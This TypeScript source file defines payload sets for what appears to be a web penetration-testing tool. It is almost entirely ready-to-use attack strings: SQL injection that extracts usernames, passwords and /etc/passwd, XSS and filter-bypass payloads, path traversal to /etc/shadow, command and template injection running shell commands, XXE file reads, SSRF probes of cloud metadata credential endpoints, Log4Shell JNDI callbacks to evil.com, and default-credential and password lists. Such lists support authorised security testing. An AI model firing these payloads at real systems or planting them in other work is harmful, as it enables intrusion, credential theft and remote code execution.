export interface PayloadSet {
  id: string
  name: string
  category: string
  description: string
  payloads: string[]
}

export const PAYLOAD_SETS: PayloadSet[] = [
  {
    id: 'sqli-error',
    name: 'SQLi — Error Based',
    category: 'SQL Injection',
    description: 'Triggers DB errors to confirm injectable parameter',
    payloads: [
      "'", "''", '"', '\\', "';", '");', '%27', '%22', "' --", '" --',
      "' OR '1'='1", "' OR 1=1--", "' OR 1=1#", "' OR 1=1/*",
      '" OR "1"="1', '" OR 1=1--', "' OR '1'='1'--",
      "1' AND '1'='1", "1' AND '1'='2",
      "' ORDER BY 1--", "' ORDER BY 2--", "' ORDER BY 5--", "' ORDER BY 10--",
      "' GROUP BY 1--", "' HAVING 1=1--",
      "1 AND 1=1", "1 AND 1=2",
      "' AND 1=convert(int,'a')--",
      "' AND extractvalue(1,concat(0x7e,version()))--",
      "' AND updatexml(1,concat(0x7e,version()),1)--",
      "'; SELECT 1--", "'; SELECT @@version--",
    ],
  },
  {
    id: 'sqli-blind',
    name: 'SQLi — Blind / Time Based',
    category: 'SQL Injection',
    description: 'Boolean and time-delay blind SQLi payloads',
    payloads: [
      "' AND 1=1--", "' AND 1=2--",
      "' AND SLEEP(3)--", "' AND SLEEP(5)--",
      "' OR SLEEP(3)--", "' OR SLEEP(5)--",
      "1; WAITFOR DELAY '0:0:3'--", "1; WAITFOR DELAY '0:0:5'--",
      "'; IF (1=1) WAITFOR DELAY '0:0:3'--",
      "' AND (SELECT SLEEP(3))--",
      "1 AND IF(1=1,SLEEP(3),0)--", "1 AND IF(1=2,SLEEP(3),0)--",
      "0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z",
      "'; SELECT pg_sleep(3)--",
      "' AND 1=(SELECT 1 FROM pg_sleep(3))--",
      "1;SELECT 1 FROM pg_sleep(3)--",
      "' AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
      "' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--",
      "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--",
    ],
  },
  {
    id: 'sqli-union',
    name: 'SQLi — UNION Based',
    category: 'SQL Injection',
    description: 'UNION SELECT payloads for data extraction',
    payloads: [
      "' UNION SELECT NULL--", "' UNION SELECT NULL,NULL--",
      "' UNION SELECT NULL,NULL,NULL--", "' UNION SELECT NULL,NULL,NULL,NULL--",
      "' UNION SELECT 1--", "' UNION SELECT 1,2--", "' UNION SELECT 1,2,3--",
      "' UNION SELECT username,password FROM users--",
      "' UNION SELECT table_name,NULL FROM information_schema.tables--",
      "' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--",
      "' UNION ALL SELECT NULL,@@version--",
      "' UNION ALL SELECT NULL,database()--",
      "' UNION ALL SELECT NULL,user()--",
      "' UNION SELECT NULL,load_file('/etc/passwd')--",
      "' UNION SELECT 1,2,3,4,5--",
    ],
  },
  {
    id: 'xss-basic',
    name: 'XSS — Basic',
    category: 'XSS',
    description: 'Classic reflected/stored XSS payloads',
    payloads: [
      '<script>alert(1)</script>',
      '"><script>alert(1)</script>',
      "'><script>alert(1)</script>",
      '<img src=x onerror=alert(1)>',
      '"><img src=x onerror=alert(1)>',
      "<img src='x' onerror='alert(1)'>",
      '<svg onload=alert(1)>',
      '"><svg onload=alert(1)>',
      '<body onload=alert(1)>',
      '<iframe src="javascript:alert(1)">',
      '<input autofocus onfocus=alert(1)>',
      '<details open ontoggle=alert(1)>',
      '<video src=1 onerror=alert(1)>',
      '<audio src=1 onerror=alert(1)>',
      "javascript:alert(1)",
      '<a href="javascript:alert(1)">x</a>',
      '<math><mi//xlink:href="data:x,<script>alert(1)</script>">',
    ],
  },
  {
    id: 'xss-bypass',
    name: 'XSS — Filter / WAF Bypass',
    category: 'XSS',
    description: 'Evasion payloads for WAFs and basic filters',
    payloads: [
      '<ImG sRc=x oNeRrOr=alert(1)>',
      '<script>alert`1`</script>',
      '<svg/onload=alert(1)>',
      '"><svg/onload=alert(1)>',
      '%3Cscript%3Ealert(1)%3C/script%3E',
      '<scr<script>ipt>alert(1)</scr</script>ipt>',
      '<<script>alert("XSS");//<</script>',
      '<script>setTimeout("alert(1)",0)</script>',
      '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
      '"><img src="x"onerror="alert(1)">',
      '<svg><script>alert(1)</script></svg>',
      "';alert(1)//",
      '");alert(1)//',
      '<script>document.write("<img src=x onerror=alert(1)>")</script>',
      '&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;',
      '\x3cscript\x3ealert(1)\x3c/script\x3e',
    ],
  },
  {
    id: 'traversal',
    name: 'Path Traversal / LFI',
    category: 'File Inclusion',
    description: 'Directory traversal and local file inclusion',
    payloads: [
      '../', '../../', '../../../', '../../../../', '../../../../../',
      '../etc/passwd', '../../etc/passwd', '../../../etc/passwd',
      '../../../../etc/passwd', '../../../../../etc/passwd',
      '../../../../../../etc/shadow',
      '..%2F', '..%2F..%2F', '..%2F..%2F..%2F',
      '..%2Fetc%2Fpasswd', '..%2F..%2Fetc%2Fpasswd',
      '%2e%2e%2f', '%2e%2e%2f%2e%2e%2f', '%2e%2e%2f%2e%2e%2f%2e%2e%2f',
      '....//....//etc/passwd', '....\\....\\etc/passwd',
      '..\\..\\windows\\win.ini', '..\\..\\..\\windows\\win.ini',
      '/etc/passwd', '/etc/shadow', '/etc/hosts', '/proc/self/environ',
      '/proc/version', '/proc/cmdline', '/var/log/apache2/access.log',
      'C:\\windows\\win.ini', 'C:\\boot.ini', 'C:\\Windows\\System32\\drivers\\etc\\hosts',
    ],
  },
  {
    id: 'cmdi',
    name: 'Command Injection',
    category: 'Injection',
    description: 'OS command injection payloads',
    payloads: [
      '; id', '| id', '& id', '&& id', '|| id',
      '; whoami', '| whoami', '&& whoami',
      '; ls -la', '| ls -la',
      '; cat /etc/passwd', '| cat /etc/passwd',
      '`id`', '$(id)', '${IFS}id',
      '; sleep 3', '| sleep 3', '& sleep 3', '`sleep 3`', '$(sleep 3)',
      '; ping -c 3 127.0.0.1', '& ping -c 3 127.0.0.1',
      '\n id', '\r\n id',
      ';id;', '|id|', '&&id',
      '$(curl http://127.0.0.1/)',
      '%0a id', '%0a%0d id',
    ],
  },
  {
    id: 'ssti',
    name: 'SSTI (Template Injection)',
    category: 'Injection',
    description: 'Server-side template injection — Jinja2, Twig, Freemarker, Pebble',
    payloads: [
      '{{7*7}}', '${7*7}', '<%= 7*7 %>', '#{7*7}', '@(7*7)',
      "{{7*'7'}}", "${7*'7'}", '{{{7*7}}}',
      '{{config}}', '{{request}}', '{{self.__dict__}}',
      '{{"".__class__.__mro__}}',
      '{{"".__class__.__mro__[1].__subclasses__()}}',
      "{{config.__class__.__init__.__globals__['os'].listdir('.')}}",
      "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
      '${"freemarker.template.utility.Execute"?new()("id")}',
      '#{7*7}', '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
      '{% for x in [].class.base.subclasses() %}{{ x }}{% endfor %}',
      '*{7*7}', '*{T(java.lang.Runtime).getRuntime().exec("id")}',
    ],
  },
  {
    id: 'xxe',
    name: 'XXE (XML Injection)',
    category: 'Injection',
    description: 'XML External Entity payloads for file read and SSRF',
    payloads: [
      '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY x SYSTEM "file:///etc/passwd">]><root>&x;</root>',
      '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY x SYSTEM "file:///etc/hosts">]><root>&x;</root>',
      '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><data>&x;</data>',
      '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "http://127.0.0.1:17707/">]><test>&xxe;</test>',
      '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
    ],
  },
  {
    id: 'open-redirect',
    name: 'Open Redirect',
    category: 'Misc',
    description: 'Payloads for open redirect / SSRF via URL params',
    payloads: [
      'https://evil.com', 'http://evil.com', '//evil.com', '///evil.com',
      '/\\evil.com', '\\\\evil.com', '/\\/evil.com',
      'https://evil.com/..', 'https://evil.com/%2e%2e',
      '/%09/evil.com', '/%2f/evil.com', '//%09evil.com',
      'https://evil.com?', 'https://evil.com#',
      'javascript:alert(1)', 'data:text/html,<script>alert(1)</script>',
      '//evil%00.com', '//evil.com%23.trusted.com',
      'https://trusted.com@evil.com',
      'https://evil.com%00.trusted.com',
    ],
  },
  {
    id: 'ssrf',
    name: 'SSRF — Internal Targets',
    category: 'SSRF',
    description: 'Server-side request forgery — internal network probes',
    payloads: [
      'http://127.0.0.1/', 'http://localhost/', 'http://[::1]/',
      'http://127.0.0.1:22/', 'http://127.0.0.1:3306/', 'http://127.0.0.1:6379/',
      'http://127.0.0.1:8080/', 'http://127.0.0.1:8443/', 'http://127.0.0.1:9200/',
      'http://169.254.169.254/', 'http://169.254.169.254/latest/meta-data/',
      'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
      'http://metadata.google.internal/', 'http://metadata.google.internal/computeMetadata/v1/',
      'http://100.100.100.200/latest/meta-data/',
      'file:///etc/passwd', 'file:///proc/self/environ',
      'dict://127.0.0.1:6379/info',
      'gopher://127.0.0.1:6379/_*1%0d%0a',
    ],
  },
  {
    id: 'fuzzing',
    name: 'Fuzzing — Special Characters',
    category: 'Fuzzing',
    description: 'Special chars and edge cases to trigger unexpected behavior',
    payloads: [
      "'", '"', '`', ';', '|', '&', '$', '<', '>', '(', ')', '{', '}',
      '[', ']', '\\', '/', '%', '#', '@', '!', '*', '^', '~',
      '%00', '%0a', '%0d', '%09', '%20', '%3d', '%3b',
      '\x00', '\r\n', '\n', '\t', '\r',
      '../../', '..;/', '....',
      ',,,,', ';;;;', '||||', '&&&&',
      'null', 'undefined', 'NaN', 'Infinity', 'true', 'false',
      '9999999999', '-1', '0', '2147483647', '-2147483648',
      "' --", '" --', '-- -', '#', '/*', '*/',
      '<>%27%22', '"><\'>', '${jndi:ldap://evil.com/x}',
    ],
  },
  {
    id: 'default-creds',
    name: 'Default Credentials',
    category: 'Auth',
    description: 'Common default username:password pairs (use with Cluster Bomb on user+pass fields)',
    payloads: [
      'admin', 'administrator', 'root', 'test', 'guest', 'user',
      'admin1', 'superuser', 'operator', 'manager', 'webadmin',
      'tomcat', 'nginx', 'apache', 'postgres', 'mysql',
      'pi', 'ubuntu', 'ec2-user', 'centos', 'oracle',
    ],
  },
  {
    id: 'common-passwords',
    name: 'Common Passwords (Top 100)',
    category: 'Auth',
    description: 'Most frequently used passwords',
    payloads: [
      '123456', 'password', '123456789', '12345678', '12345', '1234567',
      'admin', '123123', 'qwerty', 'abc123', 'letmein', 'monkey',
      '1234567890', 'password1', 'iloveyou', 'welcome', 'sunshine',
      'princess', 'shadow', 'dragon', 'master', 'hello', 'charlie',
      'donald', 'password123', 'pass', '0987654321', 'superman',
      'batman', 'access', 'test', 'guest', 'root', 'admin123',
      'changeme', 'toor', '1q2w3e', 'qwerty123', '111111', '000000',
      'pass123', 'mustang', 'login', 'solo', '88888888', '7777777',
      'trustno1', 'jennifer', 'jordan', 'hunter', '654321', '666666',
      'aaaaaa', 'qweasd', 'zxcvbn', 'asdfgh', 'zaq12wsx', '1qaz2wsx',
      'q1w2e3r4', 'baseball', 'football', 'soccer', 'hockey', 'tennis',
      'michael', 'jessica', 'ashley', 'bailey', 'passw0rd', 'p@ssword',
      'p@ssw0rd', 'P@ssw0rd', 'Admin123', 'admin@123', 'test123',
    ],
  },
  {
    id: 'log4j',
    name: 'Log4Shell (Log4j)',
    category: 'Injection',
    description: 'CVE-2021-44228 payloads for Log4j RCE',
    payloads: [
      '${jndi:ldap://evil.com/x}',
      '${jndi:ldaps://evil.com/x}',
      '${jndi:rmi://evil.com/x}',
      '${jndi:dns://evil.com/x}',
      '${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://evil.com/x}',
      '${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com/x}',
      '${j${::-n}di:ldap://evil.com/x}',
      '${${env:BARFOO:-j}ndi:${env:BARFOO:-l}dap://evil.com/x}',
      '%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fx%7D',
      '${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.evil.com/x}',
    ],
  },
]

export const CATEGORY_ORDER = ['SQL Injection', 'XSS', 'File Inclusion', 'Injection', 'SSRF', 'Fuzzing', 'Auth', 'Misc']

export function getPayloadSet(id: string): PayloadSet | undefined {
  return PAYLOAD_SETS.find(p => p.id === id)
}

export function getByCategory(category: string): PayloadSet[] {
  return PAYLOAD_SETS.filter(p => p.category === category)
}
